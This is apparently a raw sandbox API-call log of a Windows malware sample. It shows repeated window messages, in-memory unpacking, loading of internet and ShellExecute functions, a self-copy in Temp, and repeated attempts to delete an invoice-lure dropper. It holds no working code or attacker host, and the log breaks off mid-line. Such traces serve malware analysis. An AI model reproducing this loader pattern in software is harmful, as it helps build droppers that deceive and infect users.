[0281.217] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.217] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.217] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.217] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.217] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.218] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.219] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.219] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.219] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.219] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.219] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.219] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.220] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.220] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.220] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.220] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.220] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.220] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.220] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.221] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.221] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.221] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.221] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.221] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.221] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.221] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.221] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.222] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.222] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.222] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.222] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.222] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.222] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.222] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.222] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.223] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.223] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.223] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.223] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.223] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.223] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.223] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.223] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.224] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.224] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.224] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.224] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.224] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.224] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.224] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.225] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.225] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.225] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.225] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.225] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.225] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.225] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.225] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.226] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.226] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.226] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.226] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.226] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.226] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.226] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.226] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.226] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.227] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.227] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.227] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.227] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.227] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.227] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.227] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.227] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.228] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.228] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.228] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.228] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.228] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.228] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.228] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.228] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.229] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.229] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.229] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.229] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.229] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.229] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.229] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.229] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.230] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.230] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.230] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.230] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.230] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.230] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.230] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.230] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.230] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.231] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.231] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.231] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.231] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.231] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.231] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.231] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.232] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.232] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.232] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.232] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.232] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.232] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.232] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.232] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.233] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.233] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.233] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.233] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.233] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.525] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.526] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.526] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.526] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.526] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.526] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.526] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.526] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.526] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.527] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.527] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.527] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.527] DestroyWindow (hWnd=0x80064) returned 1 [0281.528] NtdllDefWindowProc_A (hWnd=0x80064, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0281.548] PostQuitMessage (nExitCode=6) [0281.603] MessageBoxA (hWnd=0x80064, lpText="turok", lpCaption=0x0, uType=0x4) returned 0 [0281.620] UpdateWindow (hWnd=0x0) returned 0 [0281.620] GetMessageA (in: lpMsg=0x505248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x505248) returned 0 [0281.622] VirtualAlloc (lpAddress=0x0, dwSize=0x48e4, flAllocationType=0x1000, flProtect=0x4) returned 0x600000 [0281.623] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0281.624] VirtualAlloc (lpAddress=0x0, dwSize=0x6000, flAllocationType=0x2000, flProtect=0x1) returned 0x610000 [0281.624] VirtualAlloc (lpAddress=0x610000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x610000 [0281.625] VirtualAlloc (lpAddress=0x611000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x611000 [0281.626] VirtualAlloc (lpAddress=0x612000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x612000 [0281.626] VirtualAlloc (lpAddress=0x613000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x613000 [0281.626] VirtualAlloc (lpAddress=0x614000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x614000 [0281.627] VirtualAlloc (lpAddress=0x615000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x615000 [0281.628] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x72ae0000 [0281.744] GetProcAddress (hModule=0x72ae0000, lpProcName="HttpSendRequestW") returned 0x72deadb0 [0281.744] GetProcAddress (hModule=0x72ae0000, lpProcName="InternetSetOptionW") returned 0x72d91e00 [0281.744] GetProcAddress (hModule=0x72ae0000, lpProcName="InternetQueryOptionW") returned 0x72d900d0 [0281.744] GetProcAddress (hModule=0x72ae0000, lpProcName="HttpOpenRequestW") returned 0x72de5850 [0281.744] GetProcAddress (hModule=0x72ae0000, lpProcName="HttpQueryInfoW") returned 0x72d92700 [0281.744] GetProcAddress (hModule=0x72ae0000, lpProcName="InternetReadFile") returned 0x72d92590 [0281.744] GetProcAddress (hModule=0x72ae0000, lpProcName="InternetConnectW") returned 0x72de6d80 [0281.745] GetProcAddress (hModule=0x72ae0000, lpProcName="InternetOpenW") returned 0x72d7b8e0 [0281.745] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76fe0000 [0281.745] GetProcAddress (hModule=0x76fe0000, lpProcName="GetTempPathW") returned 0x77003380 [0281.745] GetProcAddress (hModule=0x76fe0000, lpProcName="GetFileSize") returned 0x770032c0 [0281.745] GetProcAddress (hModule=0x76fe0000, lpProcName="GetCurrentDirectoryW") returned 0x76ff8a40 [0281.745] GetProcAddress (hModule=0x76fe0000, lpProcName="DeleteFileW") returned 0x770030d0 [0281.745] GetProcAddress (hModule=0x76fe0000, lpProcName="CloseHandle") returned 0x77002e40 [0281.745] GetProcAddress (hModule=0x76fe0000, lpProcName="WriteFile") returned 0x77003510 [0281.746] GetProcAddress (hModule=0x76fe0000, lpProcName="lstrcmpW") returned 0x770007e0 [0281.746] GetProcAddress (hModule=0x76fe0000, lpProcName="ReadFile") returned 0x77003420 [0281.746] GetProcAddress (hModule=0x76fe0000, lpProcName="GetModuleHandleW") returned 0x77000db0 [0281.746] GetProcAddress (hModule=0x76fe0000, lpProcName="ExitProcess") returned 0x77004060 [0281.746] GetProcAddress (hModule=0x76fe0000, lpProcName="HeapCreate") returned 0x770009a0 [0281.746] GetProcAddress (hModule=0x76fe0000, lpProcName="HeapAlloc") returned 0x77ce52c0 [0281.746] GetProcAddress (hModule=0x76fe0000, lpProcName="GetModuleFileNameW") returned 0x77000860 [0281.746] GetProcAddress (hModule=0x76fe0000, lpProcName="CreateFileW") returned 0x770030a0 [0281.747] GetProcAddress (hModule=0x76fe0000, lpProcName="lstrlenW") returned 0x76ffe010 [0281.747] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75dc0000 [0281.747] GetProcAddress (hModule=0x75dc0000, lpProcName="wsprintfW") returned 0x75de48b0 [0281.747] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x77230000 [0281.764] GetProcAddress (hModule=0x77230000, lpProcName="ShellExecuteW") returned 0x7732c260 [0281.764] VirtualProtect (in: lpAddress=0x610000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff0c | out: lpflOldProtect=0x19ff0c*=0x4) returned 1 [0281.766] VirtualProtect (in: lpAddress=0x611000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x19fe90 | out: lpflOldProtect=0x19fe90*=0x4) returned 1 [0281.768] VirtualProtect (in: lpAddress=0x612000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x19fe90 | out: lpflOldProtect=0x19fe90*=0x4) returned 1 [0281.768] VirtualProtect (in: lpAddress=0x613000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19fe90 | out: lpflOldProtect=0x19fe90*=0x4) returned 1 [0281.769] VirtualProtect (in: lpAddress=0x614000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x19fe90 | out: lpflOldProtect=0x19fe90*=0x4) returned 1 [0281.770] VirtualProtect (in: lpAddress=0x615000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x19fe90 | out: lpflOldProtect=0x19fe90*=0x4) returned 1 [0281.771] VirtualFree (lpAddress=0x600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0281.773] GetModuleHandleW (lpModuleName=0x0) returned 0x610000 [0281.773] HeapCreate (flOptions=0x0, dwInitialSize=0x2000, dwMaximumSize=0x0) returned 0x2370000 [0281.775] RtlAllocateHeap (HeapHandle=0x2370000, Flags=0x8, Size=0x2000) returned 0x23705b8 [0281.776] RtlAllocateHeap (HeapHandle=0x2370000, Flags=0x8, Size=0x2000) returned 0x23725c0 [0281.776] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x23705b8, nSize=0x2000 | out: lpFilename="C:\\Users\\OQXZRA~1\\AppData\\Local\\Temp\\asih.exe" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\temp\\asih.exe")) returned 0x2d [0281.776] GetTempPathW (in: nBufferLength=0x1000, lpBuffer=0x23725c0 | out: lpBuffer="C:\\Users\\OQXZRA~1\\AppData\\Local\\Temp\\") returned 0x25 [0281.776] wsprintfW (in: param_1=0x23725c0, param_2="%s%s" | out: param_1="C:\\Users\\OQXZRA~1\\AppData\\Local\\Temp\\asih.exe") returned 45 [0281.776] CreateFileW (lpFileName="C:\\Users\\OQXZRA~1\\AppData\\Local\\Temp\\asih.exe" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\temp\\asih.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0281.777] GetFileSize (in: hFile=0x1b8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc934 [0281.777] lstrlenW (lpString="C:\\Users\\OQXZRA~1\\AppData\\Local\\Temp\\asih.exe") returned 45 [0281.777] RtlAllocateHeap (HeapHandle=0x2370000, Flags=0x8, Size=0xc992) returned 0x1fe0048 [0281.832] ReadFile (in: hFile=0x1b8, lpBuffer=0x1fe0048, nNumberOfBytesToRead=0xc934, lpNumberOfBytesRead=0x19ff60, lpOverlapped=0x0 | out: lpBuffer=0x1fe0048*, lpNumberOfBytesRead=0x19ff60*=0xc934, lpOverlapped=0x0) returned 1 [0281.835] lstrcmpW (lpString1="C:\\Users\\OQXZRA~1\\AppData\\Local\\Temp\\asih.exe", lpString2="C:\\Users\\OQXZRA~1\\AppData\\Local\\Temp\\asih.exe") returned 0 [0281.841] CloseHandle (hObject=0x1b8) returned 1 [0281.841] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.842] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.844] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.844] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.844] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.845] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.845] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.845] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.845] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.845] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.846] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.846] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.846] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.846] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.846] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.847] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.847] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.847] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.847] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.847] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.848] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.848] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.848] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.848] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.848] 